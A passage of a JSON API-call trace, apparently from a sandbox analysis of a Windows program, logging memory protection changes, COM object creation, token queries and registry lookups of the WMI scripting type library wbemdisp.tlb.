                "value": "C:\\Windows\\SYSTEM32\\sxs"
              },
              {
                "name": "DllBase",
                "value": "0x7ffee08c0000"
              }
            ],
            "repeated": 0,
            "id": 720
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x0094b000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 721
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "LdrpCallInitRoutine",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "MappedPath",
                "value": "\\Device\\HarddiskVolume2\\Windows\\System32\\sxs"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee08c0000"
              },
              {
                "name": "InitRoutine",
                "value": "0x7ffee08f4890"
              },
              {
                "name": "Reason",
                "value": "1"
              }
            ],
            "repeated": 0,
            "id": 722
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2b48000"
              },
              {
                "name": "ModuleName",
                "value": "OLEAUT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 723
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2b48000"
              },
              {
                "name": "ModuleName",
                "value": "OLEAUT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 724
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstance",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "00000346-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "riid",
                "value": "E085AD58-B839-4625-B40B-4CC546E82D75"
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 725
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2b48000"
              },
              {
                "name": "ModuleName",
                "value": "OLEAUT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 726
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2b48000"
              },
              {
                "name": "ModuleName",
                "value": "OLEAUT32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 727
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020119",
                "pretty_value": "KEY_QUERY_VALUE|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|KEY_WOW64_64KEY|STANDARD_RIGHTS_REQUIRED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\MACHINE\\Software\\Classes\\PackagedCom"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Classes\\PackagedCom"
              }
            ],
            "repeated": 0,
            "id": 728
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtOpenProcessToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000008"
              },
              {
                "name": "TokenHandle",
                "value": "0x00000360"
              }
            ],
            "repeated": 0,
            "id": 729
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "com",
            "api": "CoCreateInstanceEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "rclsid",
                "value": "0000034B-0000-0000-C000-000000000046"
              },
              {
                "name": "ClsContext",
                "value": "0x00000001",
                "pretty_value": "CLSCTX_INPROC_SERVER"
              },
              {
                "name": "ServerName",
                "value": ""
              },
              {
                "name": "ProgID",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 730
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "20"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 731
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "18"
              },
              {
                "name": "TokenInformation",
                "value": "\\x01\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 732
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xc0\\x9d\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\xf0'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd8'\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x000\\x9f\\x7f\\x00\\x00\\x00\\x00\\x00!\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 733
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000364"
              },
              {
                "name": "DesiredAccess",
                "value": "0x02000000",
                "pretty_value": "MAXIMUM_ALLOWED"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\User\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes"
              }
            ],
            "repeated": 0,
            "id": 734
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000360"
              }
            ],
            "repeated": 0,
            "id": 735
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000366"
              },
              {
                "name": "SubKey",
                "value": "TypeLib"
              },
              {
                "name": "Handle",
                "value": "0x00000362"
              },
              {
                "name": "FullName",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib"
              }
            ],
            "repeated": 0,
            "id": 736
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000366"
              }
            ],
            "repeated": 0,
            "id": 737
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000362"
              },
              {
                "name": "SubKey",
                "value": "{565783C6-CB41-11D1-8B02-00600806D9B6}"
              },
              {
                "name": "Handle",
                "value": "0x00000366"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}"
              }
            ],
            "repeated": 0,
            "id": 738
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000366"
              },
              {
                "name": "SubKey",
                "value": "1.0"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.0"
              }
            ],
            "repeated": 0,
            "id": 739
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000366"
              },
              {
                "name": "Index",
                "value": "0"
              },
              {
                "name": "Name",
                "value": "1.2"
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 740
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegEnumKeyExW",
            "status": false,
            "return": "0x00000103",
            "pretty_return": "NO_MORE_ITEMS",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000366"
              },
              {
                "name": "Index",
                "value": "1"
              },
              {
                "name": "Name",
                "value": ""
              },
              {
                "name": "Class",
                "value": ""
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\"
              }
            ],
            "repeated": 0,
            "id": 741
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x00000366"
              },
              {
                "name": "SubKey",
                "value": "1.2"
              },
              {
                "name": "Handle",
                "value": "0x0000036a"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2"
              }
            ],
            "repeated": 0,
            "id": 742
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036a"
              },
              {
                "name": "SubKey",
                "value": "419"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\419"
              }
            ],
            "repeated": 0,
            "id": 743
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": false,
            "return": "0x00000002",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036a"
              },
              {
                "name": "SubKey",
                "value": "19"
              },
              {
                "name": "Handle",
                "value": "0x00000000"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\19"
              }
            ],
            "repeated": 0,
            "id": 744
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036a"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 745
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036e"
              },
              {
                "name": "SubKey",
                "value": "win64"
              },
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 746
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 747
          },
          {
            "timestamp": "2025-11-20 10:58:29,734",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 748
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegOpenKeyExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Registry",
                "value": "0x0000036a"
              },
              {
                "name": "SubKey",
                "value": "0"
              },
              {
                "name": "Handle",
                "value": "0x0000036e"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              }
            ],
            "repeated": 0,
            "id": 749
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\REGISTRY\\MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0"
              },
              {
                "name": "KeyInformationClass",
                "value": "3"
              }
            ],
            "repeated": 0,
            "id": 750
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 751
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "process",
            "api": "NtQueryInformationToken",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "TokenInformationClass",
                "value": "1"
              },
              {
                "name": "TokenInformation",
                "value": "\\xd0\\x96\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xfe\\x7f\\x00\\x00\\x01\\x05\\x00\\x00\\x00\\x00\\x00\\x05\\x15\\x00\\x00\\x00;\\x04\\xd3\\xc5\\xa0\\xefs\\xc9-\\xbe\\xd7\\x7f\\xea\\x03\\x00\\x00\\xfe\\x7f\\x00\\x00\\x087\\x8c\\xb7\\xfe\\x7f\\x00\\x00n\\x03\\x00\\x00\\x00\\x00\\x00\\x000:\\x8c\\xb7\\xfe\\x7f\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xd0\\x97\\x7f\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 752
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\REGISTRY\\USER\\S-1-5-21-3318940731-3379818400-2144845357-1002_Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_CURRENT_USER\\Software\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 753
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtQueryKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x0000036e"
              },
              {
                "name": "KeyInformation",
                "value": "\\x00\\x00\\x00\\x00"
              },
              {
                "name": "KeyInformationClass",
                "value": "7"
              }
            ],
            "repeated": 0,
            "id": 754
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "NtOpenKeyEx",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000370"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00000001",
                "pretty_value": "KEY_QUERY_VALUE"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x0000036e"
              },
              {
                "name": "ObjectAttributesName",
                "value": "win64"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64"
              }
            ],
            "repeated": 0,
            "id": 755
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegQueryValueExW",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              },
              {
                "name": "ValueName",
                "value": ""
              },
              {
                "name": "Data",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.TLB"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\TypeLib\\{565783C6-CB41-11D1-8B02-00600806D9B6}\\1.2\\0\\win64\\(Default)"
              }
            ],
            "repeated": 0,
            "id": 756
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000372"
              }
            ],
            "repeated": 0,
            "id": 757
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036e"
              }
            ],
            "repeated": 0,
            "id": 758
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x0000036a"
              }
            ],
            "repeated": 0,
            "id": 759
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000366"
              }
            ],
            "repeated": 0,
            "id": 760
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "registry",
            "api": "RegCloseKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000362"
              }
            ],
            "repeated": 0,
            "id": 761
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtCreateFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "DesiredAccess",
                "value": "0x80100080",
                "pretty_value": "GENERIC_READ|FILE_READ_ATTRIBUTES|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "CreateDisposition",
                "value": "1",
                "pretty_value": "FILE_OPEN"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              },
              {
                "name": "FileAttributes",
                "value": "0x00000000"
              },
              {
                "name": "ExistedBefore",
                "value": "yes"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 762
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtQueryInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 1,
            "id": 763
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtReadFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "Buffer",
                "value": "MZ\\x90\\x00\\x03\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\xb8\\x00\\x00\\x00\\x00\\x00\\x00\\x00@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa8\\x00\\x00\\x00"
              },
              {
                "name": "Length",
                "value": "64"
              }
            ],
            "repeated": 0,
            "id": 764
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
              {
                "name": "FileInformation",
                "value": "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
              }
            ],
            "repeated": 0,
            "id": 765
          },
          {
            "timestamp": "2025-11-20 10:58:29,750",
            "thread_id": "2188",
            "caller": "0x140084812",
            "parentcaller": "0x1400a8304",
            "category": "filesystem",
            "api": "NtSetInformationFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000360"
              },
              {
                "name": "HandleName",
                "value": "C:\\Windows\\System32\\wbem\\wbemdisp.tlb"
              },
              {
                "name": "FileInformationClass",
                "value": "14",
                "pretty_value": "FilePositionInformation"
              },
